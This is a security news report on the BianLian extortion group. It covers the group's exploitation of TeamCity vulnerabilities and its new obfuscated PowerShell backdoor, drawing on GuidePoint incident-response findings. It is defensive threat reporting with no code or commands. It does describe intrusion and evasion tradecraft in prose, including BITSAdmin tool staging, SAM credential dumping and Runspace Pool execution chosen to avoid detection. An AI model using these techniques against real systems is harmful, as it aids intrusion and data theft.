The BianLian extortion group was recently seen exploiting vulnerabilities in the TeamCity continuous integration server for initial access into networks. In the latest attacks the group also deployed a previously unknown backdoor written in PowerShell that seems to be a reimplementation of their older Golang backdoor.
“As we have seen throughout 2023 and into 2024, BianLian continues to prove how they can adapt to a changing environment, especially in regards to the exploitation of emerging vulnerabilities,” researchers from GuidePoint Security said in a new report.
BianLian is a ransomware group that emerged in 2022 and has primarily targeted organizations from healthcare, manufacturing, professional, and legal services sectors from the US and Europe. The group originally used double extortion tactics, but it switched to operations that involve only data leak extortion after researchers released a decryptor for its file encrypting program.
TeamCity as initial access vector
According to an analysis by researchers at Palo Alto Networks, BianLian has consistently been in the top 10 data extortion groups with new victims being posted on its leak site every week. The group has used various methods of gaining initial access to networks including stolen Remote Desktop Protocol (RDP) credentials, exploiting known vulnerabilities such as ProxyShell and targeting VPN providers.
During a recent investigation in a customer environment, GuidePoint’s incident response team determined that BianLian attackers broke in by exploiting a vulnerability in TeamCity, a commercial CI/CD tool developed by JetBrains that’s used to automate the building and testing of software code. Because the logs were missing from the server, the GuidePoint researchers didn’t manage to determine if the vulnerability was one of the two critical ones patched by JetBrains last week (CVE-2024-27198) or an older one patched last year (CVE-2023-42793).
What’s clear is that the exploit allowed the attackers to create new users in TeamCity and execute malicious commands on the underlying system with the privileges of TeamCity’s service account. Native Windows commands were then used to perform additional reconnaissance and discover additional software build servers on the network that could be targeted.
“The threat actor leveraged two files, winpty-agent.exe and winpty.dll to the build servers, which are legitimate files for winpty used to create an interface to run Windows commands,” the researchers said. “The threat actor used winpty-agent.exe on the build servers to remotely run commands from the exploited TeamCity server and leveraged BITSAdmin to deploy additional tools, including a malicious PowerShell script, web.ps1, to the server.”
Their attempts to dump credentials from the Windows Security Accounts Manager (SAM) was flagged by the endpoint security monitoring solution and prompted an investigation by incident responders. The investigation revealed that before deploying the PowerShell script, the attackers tried to deploy several DLLs that were quarantined by the local antivirus because they matched Win64/BianDoor.D. This is a detection signature for the group’s known backdoor written in the Go programming language.
PowerShell reimplementation of the BianLian backdoor
The PowerShell script was highly obfuscated, but the researchers managed to deobfuscate it and analyze its contents. The script had two main functions: One called cakes that implemented a mechanism for connecting to a command-and-control server using SSL streams and TCP sockets and another function called cookies that implemented the rest of the backdoor execution and capabilities.
“Perhaps the most interesting component of this whole backdoor was the innovative use of the Runspace Pool in conjunction with the .NET PowerShell.Create() method to invoke a ScriptBlock with asynchronous capabilities, all while leveraging an SSL stream to pass data between the C2 server and the infected system,” the researchers said.
Most malicious PowerShell scripts rely on the Invoke-Command or Invoke-Expression PowerShell cmdlets to execute commands or code on the system. By avoiding these well-known techniques BianLian’s script is more likely to avoid being flagged by security products. The Runspace Pool feature is also a more performant way to execute commands asynchronously.
BianLian’s Go backdoor uses digital certificates for authenticating the C2 server and this behavior is replicated in the PowerShell script. Furthermore, the IP address the script connected to was already flagged as a known C2 server for BianLian’s GO backdoor, reinforcing the attribution to this group.
“Based on these findings of shared infrastructure and AV detections, GRIT assesses with a high confidence that the analyzed PowerShell script is a PowerShell implementation of the BianLian Go backdoor,” the GuidePoint researchers said.